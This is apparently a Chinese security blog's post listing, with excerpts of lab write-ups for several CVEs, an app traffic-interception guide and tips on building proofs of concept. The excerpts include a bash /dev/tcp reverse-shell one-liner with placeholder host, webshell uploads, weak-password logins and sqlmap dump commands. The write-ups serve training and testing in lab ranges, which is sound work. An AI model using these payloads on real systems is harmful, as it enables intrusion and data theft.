- 博客(6)
- 收藏
- 关注
RSS订阅原创 用手机模拟器进行APP渗透测试抓包(超详细版)
写该博文的初衷是网上虽然也有很多用手机模拟器抓包的教程,但是都不完整,或者就是不适用于新版的手机模拟器,接下来我将一步一步的进行说明,让每个人能顺利抓包!这些都弄好后,保存设置。将证书从kali下载到windows上,然后我们要用abd将9a5ba575.0导入到模拟器中的/system/etc/security/cacerts/路径下。进入mt后,到system/etc/security/cacerts/下,看到9a5ba575.0已存在,但没有执行权限,我们还需给他加响应的权限,才能正常运作。
2024-06-02 22:42:05
752
原创 春秋云境CVE-2017-17405
bash -i >&/dev/tcp/ip/port 0>&1 --> base64 ---> urlencode,最后带入payload对应的位置。复现该漏洞需要我们自己起一个ftp服务,这里推荐用python的pyftpdlib,没有安装的小伙伴,可以现在自己的vps上安装一下。burpsuit重放一下请求包,vps成功反弹出shell,拿到flag!值得注意的是,得关注自己的vps有没有开启2121这个端口。,然后再进行urlencode编码,也就是,随后我们进入靶场,发现如下界面。
2024-05-07 11:00:41
200
2
原创 POC构造踩过的一些坑
(例如,当命令不能直接执行成功时,我们是不是可以把命令先写在一个文件中,然后间接的转发给目标主机呢;知道web站点路径,是不是尝试下写入一句话木马呢)6.如果poc不好用burp去直接去构造的话,在google和github上搜索相关漏洞的资料,看看有没有前辈已经写好的工具,当然,有的工具写的会比较粗糙,我们可以查看它的源码,将关键的地方手工修改下,再去进行尝试。4.当遇到远程代码(命令)执行漏洞时,要将VPS的IP和端口填写准确,若需要f用到web服务时,还应填写恰当的IP,来访问构造的web站点。
2024-04-25 15:00:34
100
原创 春秋云境CVE-2023-50564
靶场介绍:Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。点击manage modules,随后进入Install a module...然后将文件夹打包为zip的后缀压缩包,切记,不要直接改文件后缀名!我们需构造一个命令执行文件,然后将其放到任意命名的文件夹中,如下图所示。进入靶场后点击admin,来到管理员登录界面。尝试弱口令,最终发现密码位admin123。可以看见文件上传的地方。
2024-04-11 11:17:07
287
原创 春秋云境CVE-2023-37569
Online Piggery Management System v1.0 - 存在未授权的文件上传漏洞。随便输入信息,点击上传带有一句话木马的php文件,成功上传。又尝试了admin:password,成功进入。这时抱着试一试的态度,输入了常用的几个弱口令。首先尝试了admin:admin,发现不行。然后就找找哪有文件上传的地方,发现了一处。随后复制地址栏链接,用蚁剑连接就行啦。进入靶场发现是一个管理员登陆界面。注意flag在/目录下!一句话木马被成功解析。
2024-04-10 16:20:19
225
原创 春秋云境CVE-2023-52064
在kali上执行命令 sqlmap -r xxx.txt --dbs --batch (xxx.txt为你所构造的POC)最后执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump。再次执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns。然后执行 sqlmap -r xxx.txt -D wuzhicms --tables。在尝试目录扫描后未发现有用的路径。
2024-04-08 10:47:17
593
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人